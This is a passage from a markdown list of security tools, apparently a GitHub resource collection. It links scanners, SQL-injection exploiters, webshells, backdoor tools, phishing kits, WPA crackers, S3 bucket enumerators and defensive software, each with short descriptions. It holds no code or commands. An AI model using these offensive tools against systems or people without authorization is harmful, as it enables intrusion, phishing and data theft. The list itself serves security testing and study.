| * [nikto](https://github.com/sullo/nikto): Nikto web server scanner. 695 | * [OWASP Zed Attack Proxy (ZAP)](https://owasp.org/www-project-zap/): Integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. 696 | * [uniscan](https://github.com/poerschke/Uniscan): Uniscan web vulnerability scanner. 697 | * [vega](https://subgraph.com/vega/): It is a free and open source web security scanner and web security testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. 698 | * [Vulnerability Scanning Tools by OWASP](https://owasp.org/www-community/Vulnerability_Scanning_Tools) 699 | * [WPScan](https://github.com/wpscanteam/wpscan): WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites. 700 | 701 | #### Attack 702 | * [Burp Suite](https://portswigger.net/burp): Integrated platform for performing security testing of web applications. It has various tools that work together to support the entire testing process from the initial mapping and analysis of an application’s attack surface to finding and exploiting security vulnerabilities. Contains key components such as an intercepting proxy, application-aware spider, advanced web application scanner, intruder tool, repeater tool, and sequencer tool. 703 | * [HopLa Burp Suite Extender plugin](https://github.com/synacktiv/HopLa): Adds autocompletion support and useful payloads in Burp Suite. 704 | * [Metasploit Framework](https://github.com/rapid7/metasploit-framework) 705 | * [php-webshells](https://github.com/JohnTroony/php-webshells): Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. Do not host the file(s) on your server! 706 | * [Weevely](https://github.com/epinna/weevely3): Used to develop a backdoor shell and upload it to a target server in order to gain remote shell access. This tool also helps in performing administrative tasks, maintaining persistence, and spreading backdoors across the target network. 707 | 708 | ##### SQL Injection 709 | * [bbqsql](https://github.com/CiscoCXSecurity/bbqsql): SQL Injection Exploitation Tool. 710 | * [blind-sql-bitshifting](https://github.com/awnumar/blind-sql-bitshifting): A blind SQL injection module that uses bitshfting to calculate characters. 711 | * [Blisqy](https://github.com/JohnTroony/Blisqy): Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB). 712 | * [DSSS - Damn Small SQLi Scanner](https://github.com/stamparm/DSSS): It is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code. 713 | * [Havij](https://web.archive.org/web/20150228203859/http://itsecteam.com/products/havij-advanced-sql-injection/): It is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands. 714 | * [Mole](https://sourceforge.net/projects/themole/): It is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique. The Mole uses a command based interface, allowing the user to indicate the action he wants to perform easily. The CLI also provides auto-completion on both commands and command arguments, making the user type as less as possible. 715 | * [NoSQLMap](https://github.com/codingo/NoSQLMap): Automated NoSQL database enumeration and web application exploitation tool. 716 | * [sqlmap](http://sqlmap.org/): Is is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 717 | 718 | #### Vulnerable web applications 719 | * [Damn Vulnerable Web App (DVWA)](https://github.com/digininja/DVWA): It is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment. 720 | 721 | 722 | 723 | --- 724 | 725 | 726 | 727 | ### Protection 728 | * [atomic-red-team](https://github.com/redcanaryco/atomic-red-team): Small and highly portable detection tests based on MITRE's ATT&CK. 729 | * [brave](https://brave.com/) 730 | * [CaseFile](https://www.maltego.com/products/) 731 | * [CODE42](https://www.code42.com/) 732 | * [malwarebytes](https://www.malwarebytes.com/) 733 | * [Splunk](https://www.splunk.com/) 734 | * [Tor](https://www.torproject.org/) 735 | * [whoogle-search](https://github.com/benbusby/whoogle-search): A self-hosted, ad-free, privacy-respecting metasearch engine. 736 | 737 | #### Disk encryption 738 | * [FinalCrypt](https://www.finalcrypt.org/) 739 | * [Rohos Disk Encryption](https://www.rohos.com/products/rohos-disk-encryption/): It is program creates hidden and protected partitions on a computer, USB flash drive or cloud storage. It protects/locks access to encrypted partitions with a hardware key replacing your password. 740 | * [VeraCrypt](https://sourceforge.net/projects/veracrypt/) 741 | 742 | #### E-mail 743 | * [Egress Secure Email and File Transfer](https://www.egress.com/email-security/encryption): Secure email encryption software that delivers the highest level of security. 744 | * [Gilisoft Full Disk Encryption](http://www.gilisoft.com/product-full-disk-encryption.htm) 745 | * [Proofpoint Email Protection](https://www.proofpoint.com/us/products/email-security-and-protection) 746 | * [RMail E-Security](https://rmail.com/) 747 | * [Virtru](https://www.virtru.com/): End to End Encryption for Email and Files. 748 | * [ZixMail](https://www.getzixmail.com/products/zixmail): It is the desktop email encryption solution that provides individuals with a high level of security in their email communications. It’s an easy-to-use service that lets users encrypt and decrypt emails and attachments with a single click. 749 | 750 | #### Firewalls 751 | * [Comodo Firewall](https://personalfirewall.comodo.com/) 752 | * [ManageEngine Firewall Analyzer](https://www.manageengine.com/products/firewall/) 753 | * [pfSense](https://www.pfsense.org/) 754 | * [Sophos XG Firewall](https://www.sophos.com/en-us/products/next-gen-firewall.aspx) 755 | * [ZoneAlarm Free Firewall](https://www.zonealarm.com/software/free-firewall) 756 | 757 | #### Honeypots 758 | * [awesome-honeypots](https://github.com/paralax/awesome-honeypots): An awesome list of honeypot resources. 759 | * [Honeyd Virtual Honeypot](http://www.honeyd.org/): Is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their personality can be adapted so that they appear to be running certain operating systems. Honeyd enables a single host to claim multiple addresses - I have tested up to 65536 - on a LAN for network simulation. Honeyd improves cyber security by providing mechanisms for threat detection and assessment. It also deters adversaries by hiding real systems in the middle of virtual systems. 760 | * [KFSensor](http://www.keyfocus.net/kfsensor/): Acts as a honeypot, designed to attract and detect hackers and worms by simulating vulnerable system services and trojans. 761 | 762 | #### IDS / IPS 763 | * [Snort](https://www.snort.org/): Open Source Intrusion Prevention System (IPS) in the world. Snort IPS uses a series of rules that help define malicious network activity and uses those rules to find packets that match against them and generates alerts for users. 764 | * [wazuh](https://github.com/wazuh): Open source security platform based on OSSEC. 765 | 766 | #### Inventory management 767 | * [GLPI Project](https://glpi-project.org/) 768 | * [OCS Inventory](https://ocsinventory-ng.org/?lang=en): Open computers and software inventory is an assets management solution. 769 | * [spiceworks](https://www.spiceworks.com/) 770 | 771 | #### Passwords 772 | * [1password](https://1password.com/): Password manager. 773 | 774 | #### Patch 775 | * [Patch My PC](https://patchmypc.com/home-updater): Simplify third-party patching on your PC. 776 | * [Windows Server Update Services (WSUS)](https://docs.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus): Enables information technology administrators to deploy the latest Microsoft product updates. 777 | 778 | #### Trackers 779 | * [ClearURLs](https://chrome.google.com/webstore/detail/clearurls/lckanjgmijmafbedllaakclkaicjfmnk): This extension will automatically remove tracking elements from URLs to help protect your privacy when browse through the Internet. 780 | * [PixelBlock](https://chrome.google.com/webstore/detail/pixelblock/jmpmfcjnflbcoidlgapblgpgbilinlem): Blocks people from tracking when you open their emails. 781 | * [Privacy Badger](https://chrome.google.com/webstore/detail/privacy-badger/pkehgijcmpdhfbdbbnkijodmdjhbjlgp): Automatically learns to block invisible trackers. 782 | * [Ugly Email](https://chrome.google.com/webstore/detail/ugly-email/ldgiafaliifpknmgofiifianlnbgflgj): It is an open-source Gmail extension for identifying and blocking email trackers. 783 | 784 | 785 | 786 | --- 787 | 788 | 789 | 790 | ### Forensics 791 | * [Autopsy](https://www.autopsy.com/): Autopsy® is the premier end-to-end open source digital forensics platform. Built by Basis Technology with the core features you expect in commercial forensic tools, Autopsy is a fast, thorough, and efficient hard drive investigation solution that evolves with your needs. 792 | * [Volatility](https://github.com/volatilityfoundation/volatility): An advanced memory forensics framework. 793 | 794 | 795 | 796 | --- 797 | 798 | 799 | 800 | ### Social engineering 801 | * [avatarify](https://github.com/alievk/avatarify): Avatars for Zoom, Skype and other video-conferencing apps. 802 | * [mailtrack](https://mailtrack.io/en/)": Know when your emails are opened. 803 | * [Get Facebook account from phone number](https://www.facebook.com/login/identify?ctx=recover&lwv=100) 804 | 805 | #### Phising 806 | * [Social-Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit): It is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 807 | * [ShellPhish](https://github.com/suljot/shellphish): Phishing Tool for Instagram, Facebook, Twitter, Snapchat, Github.napchat, Github. 808 | 809 | ##### Protection 810 | 811 | ###### Employees education 812 | * [Gophish](https://getgophish.com/): Open-Source Phishing Framework. 813 | * [king-phisher](https://github.com/rsmusllp/king-phisher): Phishing Campaign Toolkit. 814 | * [OhPhish](https://ohphish.eccouncil.org/) 815 | 816 | ###### Phishing detection 817 | * [Netcraft](https://www.netcraft.com/) 818 | * [PhishTank](https://www.phishtank.com/) 819 | 820 | 821 | 822 | --- 823 | 824 | 825 | 826 | ### Hacking wireless 827 | * [aircrack-ng](https://www.aircrack-ng.org/): It is a complete suite of tools to assess WiFi network security. 828 | * [kismac-ng](https://kismac-ng.org/): Free and open-source program helps you collect essential information about surrounding WiFi networks. KisMAC WiFi scanner app can detect SSIDs, shows you the logged in clients, allows you to sketch WiFi maps, and more! 829 | * [Reaver](https://github.com/t6x/reaver-wps-fork-t6x) 830 | * [Pyrit](https://github.com/JPaulMora/Pyrit): It allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols. 831 | * [wepattack](https://sourceforge.net/projects/wepattack/): Active dictionary attack on WEP keys in WLAN networks. 832 | * [wepcrackgui](https://sourceforge.net/projects/wepcrackgui/): Gui for aircrack-ng that can crack WEP and WPA networks, automatically scans for available networks, provides fake authentication and injection support. 833 | 834 | #### Bluetooth 835 | * [bluediving](https://github.com/balle/bluediving): The Bluetooth penetration testing tool suite. 836 | 837 | #### Finding WPS-Enabled APs 838 | * [Wash](https://github.com/t6x/reaver-wps-fork-t6x) 839 | 840 | #### MAC spoofing 841 | * ifconfig 842 | * [macchanger](https://github.com/alobbs/macchanger) 843 | * [Technitium MAC Address Changer](https://technitium.com/tmac/) 844 | 845 | #### WPA3 846 | 847 | ##### Dragonblood 848 | * [dragondrain-and-time](https://github.com/vanhoefm/dragondrain-and-time): dragondrain tool can be used to test wether, or to which extend, an Access Point is vulnerable to denial-of-service attacks against WPA3's SAE handshake. dragontime is an experimental tool to perform timing attacks against the SAE handshake if MODP group 22, 23, or 24 are supported. Note that most WPA3 implementations by default do not enable these groups. 849 | * [dragonforce](https://github.com/vanhoefm/dragonforce): It is an experimental tool which takes the information recovered from our timing or cache-based attacks, and performs a password partitioning attack. This is similar to a dictionary attack. 850 | * [dragonslayer](https://github.com/vanhoefm/dragonslayer): This is an experimental tool to test WPA3's SAE and EAP-pwd implementations for vulnerabilities. We also strongly recommend to perform code inspections to assure all vulnerabilities have been properly addressed. 851 | 852 | 853 | 854 | --- 855 | 856 | 857 | 858 | ### Steganography 859 | 860 | #### Image 861 | * [CryptaPix](https://www.briggsoft.com) 862 | * [gifshuffle](http://www.darkside.com.au) 863 | * [OpenStego](https://github.com/syvaidya/openstego): It is a steganography application that provides two functionalities: a) Data Hiding: It can hide any data within an image file. b) Watermarking: Watermarking image files with an invisible signature. It can be used to detect unauthorized file copying. 864 | * [QuickStego](http://quickcrypto.com) 865 | * [SSuite Picsel](https://www.ssuitesoft.com) 866 | 867 | 868 | #### White Space 869 | * [snow](http://www.darkside.com.au/snow/): It is used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected. 870 | 871 | 872 | 873 | --- 874 | 875 | 876 | 877 | ### Internet of Things (IoT) 878 | 879 | #### Information gathering 880 | * [Shodan](https://www.shodan.io/): Search engine for Internet-connected devices. 881 | 882 | #### Maintain access 883 | * [Firmware Modification Kit](https://github.com/rampageX/firmware-mod-kit): This kit is a collection of scripts and utilities to extract and rebuild linux based firmware images. 884 | 885 | 886 | 887 | --- 888 | 889 | 890 | 891 | ### Cloud 892 | 893 | #### Containers 894 | 895 | ##### Amazon S3 896 | 897 | ###### Enumeration 898 | * [Bucket Finder](https://digi.ninja/projects/bucket_finder.php): This is a fairly simple tool to run, all it requires is a wordlist and it will go off and check each word to see if that bucket name exists in the Amazon's S3 system. Any that it finds it will check to see if the bucket is public, private or a redirect. 899 | * [lazys3](https://github.com/nahamsec/lazys3): A Ruby script to bruteforce for AWS s3 buckets using different permutations. 900 | * [s3-buckets-finder](https://github.com/gwen001/s3-buckets-finder): Find aws s3 buckets and extract datas. 901 | * [s3-inspector](https://github.com/clario-tech/s3-inspector): Tool to check AWS S3 bucket permissions. 902 | * [s3recon](https://github.com/clarketm/s3recon): Amazon S3 bucket finder and crawler. 903 | * [S3Scanner](https://github.com/sa7mon/S3Scanner): Scan for open AWS S3 buckets and dump the contents. 904 | 905 | ###### Exploit 906 | * [aws_pwn](https://github.com/dagrz/aws_pwn): A collection of AWS penetration testing junk. 907 | 908 | ##### Google Storage Buckets 909 | * [GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute): A script to enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated. 910 | 911 | ##### Scanners 912 | * [clair](https://github.com/quay/clair): Vulnerability Static Analysis for Containers. 913 | * [dagda](https://github.com/eliasgranderubio/dagda): A tool to perform static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats in docker images/containers and to monitor the docker daemon and running docker containers for detecting anomalous activities. 914 | * [trivy](https://github.com/aquasecurity/trivy): A Simple and Comprehensive Vulnerability Scanner for Container Images, Git Repositories and Filesystems. Suitable for CI. 915 | 916 | #### Salesforce 917 | 918 | ##### Scanners 919 | * [CxVSCode](https://marketplace.visualstudio.com/items?itemName=checkmarx.cxvscode): It is an IDE extension that brings the Checkmarx AppSec unique capabilities closer to the developer. 920 | 921 | ##### Javascript 922 | * [RetireJS](https://retirejs.github.io/retire.js/): There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies, but we need to stay update on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of version with known vulnerabilities. 923 | 924 | 925 | 926 | 927 | [<- Back to index](README.md) 928 | 929 | --- 930 | 931 | ## License 932 | 933 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 934 | 935 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 936 | 937 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` 938 | --------------------------------------------------------------------------------